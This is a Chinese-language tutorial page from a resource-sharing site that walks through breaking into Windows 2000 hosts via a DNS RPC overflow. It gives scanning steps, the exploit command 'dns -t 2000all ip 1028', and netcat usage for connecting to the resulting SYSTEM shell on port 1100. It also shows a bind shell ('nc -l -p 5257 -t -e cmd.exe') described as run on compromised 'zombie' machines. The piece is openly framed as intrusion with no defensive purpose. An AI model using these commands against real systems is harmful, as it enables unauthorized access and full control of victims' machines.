也想出现在这里? 联系我们

教你如何DNS溢出漏洞入侵

作者 : 小编 本文共1087个字,预计阅读时间需要3分钟 发布时间: 2021-06-13 共1.6K人阅读
也想出现在这里? 联系我们

前提是必须要开放53、445端口

1、选择superscan进行扫描,在端口列表中勾选上53、445端口,然后选择主机段进行扫描。

2、选择存在53、445端口的主机,在cmd下输入dns -t ip对主机进行特定漏洞端口扫描,“1028 :Vulnerability”表示

1028端口存在溢出漏洞,“os:window 2000”表示系统类型为window 2000。

3、在执行dns -t 2000all ip 1028 对目标主机进行溢出。connection to target host tcp port established 成功连接到主机的tcp端口上,

successfully bound to the vulnerale dcerpc interface 已经连接到对方的rpc端口上,os fingerprint result:windows 2000

系统指纹鉴定对方是wind2000系统,attack sent,check port 1100 攻击代码已经成功发送,并尝试连接1100端口。当出现最后这一句

提示语句的时候就意味着我们要成功了。

4、怎么连接对方的1100端口呢,当然我们要使用nc了。

5、nc全称叫"netcat",这是一个非常简单易用的基于tcp/ip协议(c/s模型的)的“瑞士军刀”。下面介绍一下它的几个常用功能

1、nc.exe -vv -l -p 6069,表示在本地6069端口上进行监听。-vv:显示详细的信息。-l:进行监听,监听入站信息。-p:监听所使用的

端口号。

2、正如我们遇到的情况,对方已经开放了一个端口。他在等待我们连接哦,连接上去会有什么呢?当然是system权限的shell了。

nc.exe -vv 127.0.0.1 5257,连接ip为127.0.0.1的5257端口。

3、还可以在本地监听端口的同时绑定shell,就相当于一个telnet服务端。通常这个命令在肉鸡上执行,然后当我们连接上去就可以获得

这个shell了。nc.exe -l -p 5257 -t -e cmd.exe,在本机5257端口上监听并绑定cmd.exe。-e 作用就是程序定向。-t以telnet的形式

来应答。

4、它可以用来手动对主机提交数据包(通常为80)端口,nc.exe -vv 127.0.0.1 80 <yan.txt,往ip为127.0.0.1的80端口提交yan.txt中

的内容。

6、介绍完nc.exe的四种常用方式,现在知道如何使用nc来链接对方的1100端口了吧,我们使用nc -vv 127.0.0.1 1100 连接对方的1100端口,

成功获得了一个具有system权限的cmdshell,现在想干什么就干什么了。

1. 本站所提供的源码模板(主题/插件)等资源仅供学习交流,若使用商业用途,请购买正版授权,否则产生的一切后果将由下载用户自行承担,有部分资源为网上收集或仿制而来,若模板侵犯了您的合法权益,请来信通知我们(Email: rayer@88.com),我们会及时删除,给您带来的不便,我们深表歉意!
2. 分享目的仅供大家学习和交流,请不要用于商业用途!
3. 如果你也有好源码或者教程,可以到用户中心发布投稿,分享有金币奖励和额外收入!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务 请大家谅解!
5. 如有链接无法下载、失效或广告,请联系站长,可领回失去的金币,并额外有奖!
6. 如遇到加密压缩包,默认解压密码为"www.zyfx8.cn",如遇到无法解压的请联系管理员!
本站部分文章、资源来自互联网,版权归原作者及网站所有,如果侵犯了您的权利,请及时联系我站删除。免责声明
资源分享吧 » 教你如何DNS溢出漏洞入侵

常见问题FAQ

免费下载或者VIP会员专享资源能否直接商用?
本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
织梦模板使用说明
你下载的织梦模板并不包括DedeCMS使用授权,根据DedeCMS授权协议,除个人非盈利站点外,均需购买DedeCMS商业使用授权。购买地址: http://www.desdev.cn/service-dedecms.html

发表评论

Copyright 2015-2020 版权所有 资源分享吧 Rights Reserved. 蜀ICP备14022927号-1
开通VIP 享更多特权,建议使用QQ登录